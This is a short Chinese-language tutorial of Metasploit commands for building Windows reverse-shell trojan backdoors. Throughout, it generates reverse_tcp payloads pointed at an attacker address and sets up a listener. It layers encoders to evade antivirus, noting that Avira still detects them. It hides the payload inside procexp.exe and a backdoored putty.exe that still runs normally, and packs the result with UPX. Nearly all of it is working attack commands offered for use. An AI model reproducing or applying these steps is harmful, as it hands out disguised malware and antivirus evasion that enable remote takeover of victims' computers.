1.生成简单到木马后门
root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp O //查看这个payload有什么选项
root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 X > /var/www/payload1.exe
另一个终端监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
msf exploit(handler) > set LHOST=192.168.0.112
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 192.168.0.112
msf exploit(handler) > exploit
2.单次使用msf编码器免杀
root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 R | ./msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe
3.使用msf编码器多重编码免杀
root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | ./msfencode -e x86/alpha_upper -c 2 -t raw | ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | ./msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe
这么多次的编码,仍然会被小红伞检测出来,修改里面的编码次数和编码方式,变幻一下应该免杀效果会好一些。
msfencode到编码方式:
root@bt:/opt/metasploit/msf3# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
3.自定义可执行文件模板
root@bt:/opt/metasploit/msf3# msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 R | msfencode -t exe -x work/procexp.exe -o /var/www/payload4.exe -e x86/shikata_ga_nai -c 5
4.载荷隐蔽启动
msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 R | msfencode -t exe -x work/putty.exe -o /var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 4
5.对载荷加壳
root@bt:~# upx -5 /var/www/payload3.exe